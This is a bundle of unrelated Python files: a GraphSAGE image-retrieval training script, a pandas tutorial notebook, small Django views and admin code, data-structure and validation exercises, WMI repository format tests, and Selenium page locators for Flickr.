    graphsage = SupervisedGraphSAGE(class_num, encoder_1, encoder_2)
    if args.use_cuda:
        embedding.cuda()
        encoder_1.cuda()
        encoder_2.cuda()
        graphsage.cuda()
    return graphsage
def train(args):
    """Train supervised GraphSAGE on the Landmark_clean graph.

    Returns (checkpoint_path, class_num) so test() can reload the weights.
    Python 2 source (print statements; float() casts for true division).
    """
    ## load training data
    print "loading training data ......"
    node_num, class_num = 33792, 569  # fixed size/classes of Landmark_clean
    label, feature_map, adj_lists = collectGraph_train_v2(node_num, class_num, args.feat_dim, args.num_sample, args.suffix)
    graphsage = makeModel(node_num, class_num, feature_map, adj_lists, args)
    # only parameters with requires_grad are optimized (embedding is frozen)
    optimizer = torch.optim.Adam([
        {'params': filter(lambda para: para.requires_grad, graphsage.parameters()), 'lr': args.learning_rate},
    ])
    scheduler = StepLR(optimizer, step_size=args.step_size, gamma=0.1)
    ## train -- fixed seeds make the train/validation split reproducible
    np.random.seed(2)
    random.seed(2)
    rand_indices = np.random.permutation(node_num)
    train_nodes = list(rand_indices[:args.train_num])
    val_nodes = list(rand_indices[args.train_num:])
    epoch_num = args.epoch_num
    batch_size = args.batch_size
    iter_num = int(math.ceil(args.train_num / float(batch_size)))
    check_loss = []    # mean training loss sampled every check_step iters
    val_accuracy = []  # validation accuracy per epoch
    check_step = args.check_step
    train_loss = 0.0
    iter_cnt = 0
    for e in range(epoch_num):
        graphsage.train()
        scheduler.step()  # decay LR once per epoch
        random.shuffle(train_nodes)
        for batch in range(iter_num):
            batch_nodes = train_nodes[batch*batch_size: (batch+1)*batch_size]
            # NOTE(review): positive_nodes is computed but never used below --
            # dead code or a leftover from an unsupervised-loss variant?
            positive_nodes = [random.choice(list(adj_lists[n])) for n in batch_nodes]
            batch_label = Variable(torch.LongTensor(label[batch_nodes]))
            if args.use_cuda:
                batch_label = batch_label.cuda()
            optimizer.zero_grad()
            loss = graphsage.loss(batch_nodes, batch_label)
            loss.backward()
            optimizer.step()
            iter_cnt += 1
            train_loss += loss.cpu().item()
            if iter_cnt % check_step == 0:
                check_loss.append(train_loss/check_step)
                print time.strftime('%Y-%m-%d %H:%M:%S'), "epoch: {}, iter: {}, loss:{:.4f}".format(e, iter_cnt, train_loss/check_step)
                train_loss = 0.0
        ## validation at the end of every epoch
        graphsage.eval()
        group = int(math.ceil(len(val_nodes)/float(batch_size)))
        val_cnt = 0
        for batch in range(group):
            batch_nodes = val_nodes[batch*batch_size: (batch+1)*batch_size]
            batch_label = label[batch_nodes].squeeze()
            _, score = graphsage(batch_nodes)
            batch_predict = np.argmax(score.cpu().data.numpy(), axis=1)
            val_cnt += np.sum(batch_predict == batch_label)
        val_accuracy.append(val_cnt/float(len(val_nodes)))
        print time.strftime('%Y-%m-%d %H:%M:%S'), "Epoch: {}, Validation Accuracy: {:.4f}".format(e, val_cnt/float(len(val_nodes)))
        print "******" * 10
    # checkpoint name carries the wall-clock time to avoid overwrites
    checkpoint_path = 'checkpoint/checkpoint_{}.pth'.format(time.strftime('%Y%m%d%H%M'))
    torch.save({
        'train_num': args.train_num,
        'epoch_num': args.epoch_num,
        'learning_rate': args.learning_rate,
        'embed_dim_1': args.embed_dim_1,
        'embed_dim_2': args.embed_dim_2,
        'num_sample': args.num_sample,
        'use_gcn': args.use_gcn,
        'graph_state_dict': graphsage.state_dict(),
        'optimizer': optimizer.state_dict(),
        },
        checkpoint_path)
    # plot loss / accuracy curves to a visdom server (port 8099)
    vis = visdom.Visdom(env='Graph', port='8099')
    vis.line(
        X = np.arange(1, len(check_loss)+1, 1) * check_step,
        Y = np.array(check_loss),
        opts = dict(
            title=time.strftime('%Y-%m-%d %H:%M:%S') + ', gcn {}'.format(args.use_gcn),
            xlabel='itr.',
            ylabel='loss'
        )
    )
    vis.line(
        X = np.arange(1, len(val_accuracy)+1, 1),
        Y = np.array(val_accuracy),
        opts = dict(
            title=time.strftime('%Y-%m-%d %H:%M:%S') + ', gcn {}'.format(args.use_gcn),
            xlabel='epoch',
            ylabel='accuracy'
        )
    )
    return checkpoint_path, class_num
def test(checkpoint_path, class_num, args):
    """Compare retrieval mAP of the base features vs GraphSAGE features
    on each configured test set (Oxford5k and Paris6k)."""
    for key in building.keys():
        node_num = test_dataset[key]['node_num']
        old_feature_map, adj_lists = collectGraph_test(test_dataset[key]['feature_path'], node_num, args.feat_dim, args.num_sample, args.suffix)
        graphsage = makeModel(node_num, class_num, old_feature_map, adj_lists, args)
        checkpoint = torch.load(checkpoint_path)
        graphsage_state_dict = graphsage.state_dict()
        # copy only the trained weight tensors from the checkpoint; the
        # (frozen) embedding table differs per dataset and must stay local
        for w in ['weight', 'encoder_1.weight', 'encoder.weight']:
            graphsage_state_dict.update({w: checkpoint['graph_state_dict'][w]})
        graphsage.load_state_dict(graphsage_state_dict)
        graphsage.eval()
        batch_num = int(math.ceil(node_num/float(args.batch_size)))
        new_feature_map = torch.FloatTensor()
        for batch in tqdm(range(batch_num)):
            start_node = batch*args.batch_size
            end_node = min((batch+1)*args.batch_size, node_num)
            test_nodes = range(start_node, end_node)
            new_feature, _ = graphsage(test_nodes)
            # L2-normalize the new embeddings, then accumulate rows on CPU
            new_feature = F.normalize(new_feature, p=2, dim=0)
            new_feature_map = torch.cat((new_feature_map, new_feature.t().cpu().data), dim=0)
        new_feature_map = new_feature_map.numpy()
        # dot-product similarity matrices for old and new features
        old_similarity = np.dot(old_feature_map, old_feature_map.T)
        new_similarity = np.dot(new_feature_map, new_feature_map.T)
        mAP_old = building[key].evalRetrieval(old_similarity, retrieval_result)
        mAP_new = building[key].evalRetrieval(new_similarity, retrieval_result)
        print time.strftime('%Y-%m-%d %H:%M:%S'), 'eval {}'.format(key)
        print 'base feature: {}, new feature: {}'.format(old_feature_map.shape, new_feature_map.shape)
        print 'base mAP: {:.4f}, new mAP: {:.4f}, improvement: {:.4f}'.format(mAP_old, mAP_new, mAP_new-mAP_old)
        print ""
if __name__ == "__main__":
    # CLI: hyperparameters for training + evaluation; unknown args ignored.
    parser = argparse.ArgumentParser(description = 'Supervised GraphSAGE, train on Landmark_clean, test on Oxford5k and Paris6k.')
    parser.add_argument('-E', '--epoch_num', type=int, default=70, required=False, help='training epoch number.')
    parser.add_argument('-R', '--step_size', type=int, default=30, required=False, help='learning rate decay step_size.')
    parser.add_argument('-B', '--batch_size', type=int, default=128, required=False, help='training batch size.')
    parser.add_argument('-S', '--check_step', type=int, default=50, required=False, help='loss check step.')
    parser.add_argument('-C', '--use_cuda', type=ast.literal_eval, default=True, required=False, help='whether to use gpu (True) or not (False).')
    parser.add_argument('-G', '--use_gcn', type=ast.literal_eval, default=True, required=False, help='whether to use gcn (True) or not (False).')
    parser.add_argument('-L', '--learning_rate', type=float, default=0.005, required=False, help='training learning rate.')
    parser.add_argument('-N', '--num_sample', type=int, default=10, required=False, help='number of neighbors to aggregate.')
    parser.add_argument('-x', '--suffix', type=str, default='.frmac.npy', required=False, help='feature type, \'f\' for vggnet (512-d), \'fr\' for resnet (2048-d), \'frmac\' for vgg16_rmac (512-d).')
    parser.add_argument('-f', '--feat_dim', type=int, default=512, required=False, help='input feature dim of node.')
    parser.add_argument('-d', '--embed_dim_1', type=int, default=512, required=False, help='embedded feature dim of encoder_1.')
    parser.add_argument('-D', '--embed_dim_2', type=int, default=512, required=False, help='embedded feature dim of encoder_2.')
    parser.add_argument('-T', '--train_num', type=int, default=25000, required=False, help='number of training nodes (less than 36460). Left for validation.')
    args, _ = parser.parse_known_args()
    # Echo the full configuration before training starts.
    print "< < < < < < < < < < < Supervised GraphSAGE > > > > > > > > > >"
    print "= = = = = = = = = = = PARAMETERS SETTING = = = = = = = = = = ="
    for k, v in vars(args).items():
        print k, ":", v
    print "= = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = ="
    # print "training ......"
    checkpoint_path, class_num = train(args)
    print "testing ......"
    test(checkpoint_path, class_num, args)
|
#!/usr/bin/env python
# coding: utf-8
# # Pandas full tutorial : Most useful techniques
# (Jupyter-notebook export; the "In[n]" markers are cell boundaries.)
# In[2]:
# Import all the libraries:
#   pandas       : data analysis
#   numpy        : scientific computing
#   matplotlib / seaborn : data visualization
#   scikit-learn : classical ML algorithms
#   math         : mathematical functions
import pandas as pd
import numpy as np
from numpy.random import randn
from pandas import *
import math
import matplotlib.pyplot as plt
import pandas as pd
import seaborn as sns
get_ipython().run_line_magic('matplotlib', 'inline')
# In[2]:
# Version of pandas in use
pd.__version__
# In[12]:
# Create a Series of 5 random numbers with an explicit index
l_one= ['a','b','c','d','e']
s= Series(randn(5), index=l_one)
s
# In[13]:
# Membership tests check the *index labels*, not the values
'b' in s
# In[16]:
# Value at index label 'b'
s['b']
# In[17]:
# The index object of the series
s.index
# In[18]:
# Series -> dict (index labels become keys)
mapping=s.to_dict()
mapping
# In[19]:
# dict -> Series
s=Series(mapping)
s
# In[20]:
# Positional slicing: first three values
s[:3]
# In[22]:
# Series rendered as a single string
string1=s.to_string()
string1
# In[23]:
# Index of the rebuilt series
s.index
# In[25]:
# Reindex: 'g' and 'h' are absent from `mapping`, so they become NaN
s=Series(mapping, index=['a','b','c','g','h'])
s
# In[27]:
# Rows whose value is null (the reindexed 'g' and 'h')
s[isnull(s)]
# In[28]:
# Rows whose value is not null
s[notnull(s)]
# In[32]:
# Drop the rows where at least one element is missing
s.dropna()
# In[33]:
# Arithmetic operations broadcast element-wise ( +, -, *, / )
s*2
# In[34]:
s+2
# # Data frame : 2 D collection of the series
#
# In[11]:
# Build a data frame from a dict of columns
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6) })
df
# In[38]:
# Columns of the dataframe
df.columns
# In[39]:
# Row index of the dataframe
df.index
# In[43]:
# Column selection
df['a']
# In[44]:
# Add another column (a repeated list broadcast over the rows)
df['d']= ['whats up']*6
# In[45]:
df
# In[46]:
# Row slicing by position
df[:4]
# In[15]:
# Label-based indexing (.loc) -- both endpoints are included
df.loc[2:5,['b','c']]
# In[16]:
# Position-based indexing (.iloc) -- end point excluded
df.iloc[2:5]
# In[17]:
# Boolean filtering on a column condition
df[df['c']>0]
# In[55]:
# New DataFrame indexed by a date range
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6)}, index = pd.date_range('1/1/2020', periods=6) )
df
# In[58]:
# Declaring column 'd' without data yields an all-NaN column
df=DataFrame({'a': np.random.randn(6),'b': ['hi','bye']*3,
'c': np.random.randn(6)},columns=['a','b','c','d'], index = pd.date_range('1/1/2020', periods=6) )
df
# In[59]:
# Element-wise null check for the whole frame
isnull(df)
# # Creation from nested Dict
# In[61]:
data={}
for col in ['hi', 'hello', 'hey']:
for row in ['a','b','c','d']:
data.setdefault(col,{})[row]=randn()
data
# In[62]:
#Convert into a dataframe
DataFrame(data)
# In[63]:
#Delete values based on [column][row]
del data['hey']['c']
# In[64]:
DataFrame(data)
# # Data Analysis
# In[3]:
#Read csv
stocks_data= pd.read_csv('/Users/priyeshkucchu/Desktop/Stocks.csv',engine='python',index_col=0,parse_dates=True)
# In[90]:
#Show data
stocks_data
# In[82]:
#Show top 5 records
stocks_data.head(5)
# In[83]:
#Show last 5 records
stocks_data.tail(5)
# In[71]:
#Show unique values in a column
stocks_data.Name.unique()
# In[84]:
#Show statistics ( mean, std, count, percentile, max, min)
stocks_data.describe()
# In[85]:
#Show column information ( count, type, null or non-null, memory usage)
stocks_data.info()
# In[86]:
#Show no of records in each column
stocks_data.count()
# In[129]:
#s1=stocks_data.Name["AAPL"][-20:]
#s2=stocks_data.Name["AAPL"][-25:-10]
#side_by_side(s1,s2)
# In[19]:
#List values based on position based indexing
df=stocks_data.iloc[1:20]
df
# In[101]:
#Sort values by a column and reset index
stocks_data.sort_values(by='close',ascending=True).reset_index().head(5)
# In[147]:
# Group by a column
stocks_data.groupby(stocks_data.Name=="AAPL").count()
# In[142]:
#Check if the values are null or non-null
stocks_data.isnull().head()
# In[165]:
# Show no of records of a column
df.Name.count()
# In[169]:
df.shape[0]
# In[9]:
#Boolean Indexing
stocks_data.loc[(stocks_data["open"]>14.0) & (stocks_data["close"]<15.0) & (stocks_data["Name"]=="AAL"),("open","close","Name")]
# In[17]:
#Apply Function
def missing_values(x):
    """Count the missing (NaN) entries in the Series/column *x*."""
    null_flags = x.isnull()
    return sum(null_flags)
print("Missing values each column:")
print (stocks_data.apply(missing_values,axis=0))
print("\n Missing values each row:")
print (stocks_data.apply(missing_values,axis=1).head())
# In[24]:
#Imputing missing values with the column mode
from scipy.stats import mode
mode(stocks_data["open"])
# In[25]:
mode(stocks_data["high"])
# In[26]:
mode(stocks_data["low"])
# In[28]:
# Replace NaNs in each price column with that column's most common value.
stocks_data["open"].fillna(mode(stocks_data["open"]).mode[0],inplace=True)
stocks_data["high"].fillna(mode(stocks_data["high"]).mode[0],inplace=True)
stocks_data["low"].fillna(mode(stocks_data["low"]).mode[0],inplace=True)
# In[29]:
print("Missing values each column:")
print (stocks_data.apply(missing_values,axis=0))
# In[4]:
#Pivot Table: mean volume per (open, close, high) combination
imput_grps= stocks_data.pivot_table(values=["volume"], index=["open","close","high"],aggfunc=np.mean)
print (imput_grps)
# In[22]:
# One histogram of "open" per ticker Name.
stocks_data.hist(column="open", by="Name", bins=30, figsize=(100,100))
# In[ ]:
|
from django.views.generic.simple import direct_to_template
from django.shortcuts import render_to_response
from django.http import HttpResponse
from models import RequestItem
def request_list(request, template="main/request_list.html"):
    """Render the ten most relevant requests, sorted by priority.

    For AJAX calls carrying a ``priority`` GET parameter, the queryset is
    re-sorted by that field and only the list fragment is rendered.
    """
    req_count = 10
    # Bug fix: chained .order_by() calls REPLACE each other in Django, so
    # .order_by("created").order_by("-priority") sorted by priority only.
    # Passing both fields in one call sorts by priority, then created.
    requests = RequestItem.objects.all().order_by("-priority", "created")
    if "priority" in request.GET and request.is_ajax():
        # NOTE(review): the field name comes straight from the client;
        # Django raises FieldError for unknown fields -- confirm desired.
        requests = requests.order_by(request.GET["priority"])
        return render_to_response("main/requests_include.html",
                                  {"requests": requests[:req_count]})
    return direct_to_template(request,
                              template,
                              {'requests': requests[:req_count]})
def ajax_request_priority(request):
    """
    Get priority value for request object and change priority.
    Return status either "success" or "fail".
    """
    contain_valid_keys = "priority" in request.POST and "pk" in request.POST
    if contain_valid_keys and request.is_ajax():
        try:
            pk = int(request.POST['pk'])
            priority = int(request.POST['priority'])
        except ValueError:
            # Non-numeric input from the client.
            return HttpResponse("fail")
        # Robustness fix: a stale/unknown pk used to raise DoesNotExist and
        # return a 500; report "fail" to the client instead.
        try:
            request_item = RequestItem.objects.get(pk=pk)
        except RequestItem.DoesNotExist:
            return HttpResponse("fail")
        request_item.priority = priority
        request_item.save()
        return HttpResponse("success")
    return HttpResponse("fail")
|
'''
@Description: 反转单链表的相关操作
@Date: 2020-04-13 23:45:50
@Author: Wong Symbol
@LastEditors: Wong Symbol
@LastEditTime: 2020-06-15 00:28:16
'''
class Node:
    """A singly linked list node: a payload plus a pointer to the next node.

    ``_next`` starts as None and is wired up by the owning list.
    """

    def __init__(self, data=None):
        self.data = data
        self._next = None
class LinkedList:
    """Singly linked list with head insertion and recursive traversal/reversal."""

    def __init__(self):
        self._head = None

    def push(self, val):
        """Insert *val* at the head of the list in O(1).

        Simplification: a fresh Node's _next is already None, so prepending
        works identically for the empty and the non-empty list -- the
        original's separate empty-list branch was redundant.
        """
        new_node = Node(val)
        new_node._next = self._head
        self._head = new_node

    # Key point: statements before the recursive call run in list order,
    # statements after it run in reverse order (on stack unwind).
    def iteration(self, head_node):
        """Recursively walk the list and print the values in reverse order."""
        if head_node is None:
            return head_node
        # forward-order traversal would print here:
        # print(head_node.data)
        self.iteration(head_node._next)
        # reverse-order traversal
        print(head_node.data)

    def traverse(self, head_node, new_head):
        '''
        # alternative version
        if head_node is None:
            return
        if head_node._next is None:
            new_head = head_node
        else:
            new_head = self.traverse(head_node._next, new_head)
            head_node._next._next = head_node
            head_node._next = None
        return new_head
        '''
        # Reverse the list in place and return the new head Node.
        # The global counter only traces how many links were flipped; the
        # reset runs on every descent (before any increment), so the counts
        # printed on unwind are 1..n-1.
        global i
        i = 0
        if head_node._next is None:
            return head_node
        blank_node = self.traverse(head_node._next, new_head)
        # print(blank_node)
        head_node._next._next = head_node
        head_node._next = None
        i += 1
        print('迭代:', i)
        print(head_node.data)
        return blank_node

    def show(self):
        """Print every value from head to tail."""
        current = self._head
        while current:
            print(current.data)
            current = current._next
if __name__ == '__main__':
    # Build the list 3 -> 2 -> 1 (push prepends) and print it.
    l = LinkedList()
    l.push(1)
    l.push(2)
    l.push(3)
    l.show()
    print('链表的迭代访问:')
    l.iteration(l._head)
    print('#'*4)
    exit()
    # NOTE: everything below is dead code -- exit() above terminates the
    # script before the reversal demo runs.
    new_head = None
    # one might expect t to still be a LinkedList, but it is actually a Node
    t = l.traverse(l._head,new_head)
    print('type of t:',type(t))
    while t:
        print(t.data,end="->")
        t = t._next
from . import ImageCaptionsDataset, RSICD, Sydney, UCM |
from django.contrib import admin
from . import models
# Register your models here.
class TodoListAdmin (admin.ModelAdmin):
    """Admin changelist for TodoList: show title with both date columns."""
    list_display = ("title", "created", "due_date")
class CategoryAdmin(admin.ModelAdmin):
    """Admin changelist for Category: show only the name."""
    list_display = ("name",)
# Attach the customized admin classes to their models.
admin.site.register (models.TodoList, TodoListAdmin)
admin.site.register (models.Category, CategoryAdmin)
|
import datetime
class _ValidationError(Exception):
    """Base class for employee-field validation errors.

    Each subclass only supplies a message ``template``; the shared __init__
    builds the human-readable ``message`` from the offending value and the
    field (variable) name.  Message texts are byte-identical to the
    original classes, so callers that read ``e.message`` are unaffected.
    """

    template = 'Value {} invalid. Variable --{}--'

    def __init__(self, key, value):
        self.message = self.template.format(value, key)
        # Also hand the text to Exception so str(e) is no longer empty.
        super(_ValidationError, self).__init__(self.message)


class ValueTooShort(_ValidationError):
    template = 'Value {} too short. Variable --{}--'


class ValueTooLong(_ValidationError):
    template = 'Value {} too long. Variable --{}--'


class ValueContainsNumbers(_ValidationError):
    template = 'Value {} contains numbers. Variable --{}--'


class ValueContainsIllegalSymbols(_ValidationError):
    template = 'Value {} contains illegal symbols. Variable --{}--'


class ValueEmpty(_ValidationError):
    template = 'Value {} empty. Variable --{}--'


class ValueContainsChars(_ValidationError):
    template = 'Value {} contains chars. Variable --{}--'


class YearSmallerThenCompanyFounded(_ValidationError):
    template = 'Year {} is smaller then company founded. Variable --{}--'


class FutureNotComesYet(_ValidationError):
    template = 'Year {} is in the Future that not comes yet. Variable --{}--'


class IncorrectDepartment(_ValidationError):
    template = 'Value {} is incorrect department. Variable --{}--'
class Employee:
    """Employee record whose fields are validated on construction.

    A failed check prints the validation message and leaves the
    corresponding attribute unset; a passing check assigns it.
    """

    year_of_founding = 2010
    current_year = datetime.datetime.now().year
    departments = ['Accounts', 'IT', 'Sales', 'Marketing']

    def is_value_too_short(self, key, value):
        if len(value) < 2:
            raise ValueTooShort(key, value)

    def is_value_too_long(self, key, value):
        if len(value) > 30:
            raise ValueTooLong(key, value)

    def is_value_contains_numbers(self, key, value):
        for ch in str(value):
            if ch.isnumeric():
                raise ValueContainsNumbers(key, value)

    def is_value_contains_illegal_symbols(self, key, value):
        # NOTE(review): rejects any non-alphanumeric character, including
        # spaces and hyphens -- confirm that is intended for names.
        for ch in str(value):
            if not ch.isalnum():
                raise ValueContainsIllegalSymbols(key, value)

    def is_value_empty(self, key, value):
        if not value:
            raise ValueEmpty(key, value)

    def is_value_contains_chars(self, key, value):
        for ch in str(value):
            if not ch.isnumeric():
                raise ValueContainsChars(key, value)

    def is_year_correct(self, key, value):
        if value < Employee.year_of_founding:
            raise YearSmallerThenCompanyFounded(key, value)
        elif value > Employee.current_year:
            raise FutureNotComesYet(key, value)

    def is_department_correct(self, key, value):
        if value not in Employee.departments:
            raise IncorrectDepartment(key, value)

    def check_value(self, key, value, list_of_checks):
        """Run the numbered checks against (key, value).

        Returns True when every requested check passes; otherwise prints the
        validation message and returns None (falsy), as before.
        """
        # Dispatch table replaces the original eight-branch if-chain.
        # Checks still run in ascending numeric order; unknown numbers are
        # silently skipped, matching the original behavior.
        checks = {
            1: self.is_value_empty,
            2: self.is_value_too_short,
            3: self.is_value_too_long,
            4: self.is_value_contains_numbers,
            5: self.is_value_contains_illegal_symbols,
            6: self.is_value_contains_chars,
            7: self.is_year_correct,
            8: self.is_department_correct,
        }
        try:
            for number in sorted(list_of_checks):
                if number in checks:
                    checks[number](key, value)
        except Exception as e:
            # Robustness fix: an unexpected exception without a .message
            # attribute used to raise AttributeError here; fall back to str().
            print(getattr(e, 'message', str(e)))
        else:
            return True

    def __init__(self, name, surname, department, year):
        if self.check_value('name', name, [1, 2, 3, 4, 5]):
            self.name = name
        if self.check_value('surname', surname, [1, 2, 3, 4, 5]):
            self.surname = surname
        if self.check_value('department', department, [1, 8]):
            self.department = department
        if self.check_value('year', year, [1, 5, 6, 7]):
            self.year = year
# Smoke run: year=None fails the emptiness check, so a validation message is
# printed and the 'year' attribute is never set.
#while True:
Employee('ssss', 'sssss', 'IT', None)
|
# -*- coding: utf-8 -*-
"""Tests for WMI Common Information Model (CIM) repository files."""
import os
import unittest
from dtformats import wmi_repository
from tests import test_lib
# TODO: add tests for IndexBinaryTreePage
# TODO: add tests for ObjectRecord
# TODO: add tests for ObjectsDataPage
class IndexBinaryTreeFileTest(test_lib.BaseTestCase):
    """Index binary-tree (Index.btr) file tests."""

    # pylint: disable=protected-access

    # TODO: add tests for _DebugPrintPageBody
    # TODO: add tests for _GetPage
    # TODO: add tests for _ReadPage
    # TODO: add tests for _ReadPageKeyData
    # TODO: add tests for _ReadPageValueData
    # TODO: add tests for _ReadSubPages
    # TODO: add tests for GetFirstMappedPage
    # TODO: add tests for GetMappedPage
    # TODO: add tests for GetRootPage

    def testReadFileObject(self):
        """Tests the ReadFileObject."""
        # Presumably INDEX.BTR is only meaningful alongside its INDEX.MAP
        # companion, hence the extra existence check -- confirm.
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.IndexBinaryTreeFile(
            output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.BTR'])
        self._SkipIfPathNotExists(test_file_path)
        test_file.Open(test_file_path)
        test_file.Close()
class MappingFileTest(test_lib.BaseTestCase):
    """Mappings (*.map) file tests."""

    # pylint: disable=protected-access

    # TODO: add tests _DebugPrintMappingTable
    # TODO: add tests _DebugPrintUnknownTable

    def testReadFileFooter(self):
        """Tests the _ReadFileFooter function."""
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.MappingFile(output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        with open(test_file_path, 'rb') as file_object:
            # The footer is read from the last 4 bytes of the file.
            file_object.seek(-4, os.SEEK_END)
            test_file._ReadFileFooter(file_object)

    def testReadFileHeader(self):
        """Tests the _ReadFileHeader function."""
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.MappingFile(output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        with open(test_file_path, 'rb') as file_object:
            test_file._ReadFileHeader(file_object, format_version=1)

    def testReadMappingTable(self):
        """Tests the _ReadMappingTable function."""
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.MappingFile(output_writer=output_writer)
        test_file.format_version = 1
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        with open(test_file_path, 'rb') as file_object:
            # Offset 12 presumably skips the format-version-1 file header --
            # confirm against the format definition.
            file_object.seek(12, os.SEEK_SET)
            test_file._ReadMappingTable(file_object)

    def testReadUnknownTable(self):
        """Tests the _ReadUnknownTable function."""
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.MappingFile(output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        with open(test_file_path, 'rb') as file_object:
            # NOTE(review): offset 572 appears specific to this INDEX.MAP
            # test fixture.
            file_object.seek(572, os.SEEK_SET)
            test_file._ReadUnknownTable(file_object)

    def testReadFileObject(self):
        """Tests the ReadFileObject."""
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.MappingFile(output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'INDEX.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        test_file.Open(test_file_path)
        test_file.Close()
class ObjectsDataFileTest(test_lib.BaseTestCase):
    """Objects data (Objects.data) file tests."""
    # Docstring fixed: it was copy-pasted from IndexBinaryTreeFileTest.

    # TODO: add tests _GetKeyValues
    # TODO: add tests _GetPage
    # TODO: add tests _ReadPage
    # TODO: add tests GetMappedPage
    # TODO: add tests GetObjectRecordByKey

    def testReadFileObject(self):
        """Tests the ReadFileObject."""
        test_file_path = self._GetTestFilePath(['cim', 'OBJECTS.MAP'])
        self._SkipIfPathNotExists(test_file_path)
        output_writer = test_lib.TestOutputWriter()
        test_file = wmi_repository.ObjectsDataFile(
            output_writer=output_writer)
        test_file_path = self._GetTestFilePath(['cim', 'OBJECTS.DATA'])
        self._SkipIfPathNotExists(test_file_path)
        test_file.Open(test_file_path)
        # NOTE(review): unlike the other tests, the file is never Close()d.
# TODO: add tests for CIMRepository
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
def summ(a, b):
    """Print the sum of *a* and *b* (returns nothing)."""
    total = a + b
    print(total)
def subb(x, y):
    """Print the difference x - y (returns nothing)."""
    difference = x - y
    print(difference)
def mul(u, v):
    """Print the product of *u* and *v* (returns nothing)."""
    product = u * v
    print(product)
|
import matplotlib
import numpy
import matplotlib.pyplot as plt
def normalize(x):
    """Return a z-score normalized copy of *x* (a list of numbers).

    Each value is shifted by the mean and divided by the population
    standard deviation.  Raises ZeroDivisionError for constant input
    (zero variance).
    """
    input_data = x[:]
    N = len(input_data)
    mean = float(sum(input_data)) / N
    # Population variance via Var(X) = E[X^2] - E[X]^2.
    variance = float(sum([i**2 for i in input_data])) / N - mean**2
    # Bug fix: the original called math.sqrt, but this module never imports
    # math, so normalize() always raised NameError.  Use exponentiation.
    std_dev = variance ** 0.5
    return [float(i - mean) / std_dev for i in input_data]
def transform(samples):
    '''Discrete Fourier Transform of an array'''
    # Copy first so the caller's sequence is never touched, then make sure
    # we hand numpy an ndarray before running the FFT.
    data = samples[:]
    if not isinstance(data, numpy.ndarray):
        data = numpy.array(data)
    return numpy.fft.fft(data)
def draw(y_values, x_values=None):
    '''draw a bar graph of y_values at y axis and x_values at x axis'''
    # Width of each bar in axis units.
    graph_width = 0.05
    if x_values is None:
        x_values = range(len(y_values))
    if len(x_values) != len(y_values):
        raise Exception("Input data are not in same size")
    # Plot magnitudes, so the complex output of transform() can be drawn.
    y_values = [i.__abs__() for i in y_values]
    #print y_values
    p1 = plt.bar(x_values, y_values, graph_width)
    plt.show()
    pass
|
from selenium.webdriver.common.by import By
class MainPageLocator(object):
    """ Class for user main page WebElement locators."""
    ####################################################
    #                  Navigation bar                  #
    ####################################################
    FLICKER_LOGO_LINK = (By.CSS_SELECTOR, 'a[href="/"]')
    GET_PRO_LINK = (By.CSS_SELECTOR, 'a[data-track="gnGetProMainClick"]')
    UPLOAD_LINK = (By.CSS_SELECTOR, 'a[aria-label="Upload"]')

    # Navigation bar - You list
    ############################
    YOU_LIST = (By.CSS_SELECTOR, 'li[data-context="you"]')
    YOU_LINK = (By.CSS_SELECTOR, 'a[data-track="gnYouMainClick"]')
    YOU = {
        "YOU_ABOUT": (By.CSS_SELECTOR, 'a[data-track="gnYouAboutClick"]'),
        "YOU_PHOTOSTREAM": (By.CSS_SELECTOR,
                            'a[data-track="gnYouPhotostreamClick"]'),
        "YOU_ALBUMS": (By.CSS_SELECTOR,
                       'a[data-track="gnYouSetsClick"]'),
        "YOU_FAVS": (By.CSS_SELECTOR,
                     'a[data-track="gnYouFavoritesClick"]'),
        "YOU_GALLERIES": (By.CSS_SELECTOR,
                          'a[data-track="gnYouGalleriesClick"]'),
        "YOU_GROUPS": (By.CSS_SELECTOR,
                       'a[data-track="gnYouGroupsClick"]'),
        "YOU_CAMERA_ROLL": (By.CSS_SELECTOR,
                            'a[data-track="gnYouCameraRollClick"]'),
        "YOU_RECENT_ACTIVITY": (By.CSS_SELECTOR,
                                'a[data-track="gnYouRecentActivityClick"]'),
        "YOU_PEOPLE": (By.CSS_SELECTOR,
                       'a[data-track="gnYouPeopleClick"]'),
        "YOU_ORGANIZE": (By.CSS_SELECTOR,
                         'a[data-track="gnYouOrganizeClick"]')
    }

    # Navigation bar - Explore list
    ###############################
    EXPLORE_LIST = (By.CSS_SELECTOR, 'li[data-context="explore"]')
    EXPLORE_LINK = (By.CSS_SELECTOR, 'a[data-track="gnExploreMainClick"]')
    EXPLORE = {
        "EXPLORE_RECENT_PHOTOS": (By.CSS_SELECTOR,
                                  'a['
                                  'data-track="gnExploreRecentPhotosClick"]'),
        "EXPLORE_TRENDING": (By.CSS_SELECTOR,
                             'a[data-track="gnExploreTagsClick"]'),
        "EXPLORE_EVENTS": (By.CSS_SELECTOR,
                           'a[data-track="gnExploreEventsClick"]'),
        "EXPLORE_THE_COMMONS": (By.CSS_SELECTOR,
                                'a[data-track="gnExploreTheCommonsClick"]'),
        "EXPLORE_FLICKR_GALLERIES": (By.CSS_SELECTOR,
                                     'a['
                                     'data-track="gnExploreGalleriesClick"]'),
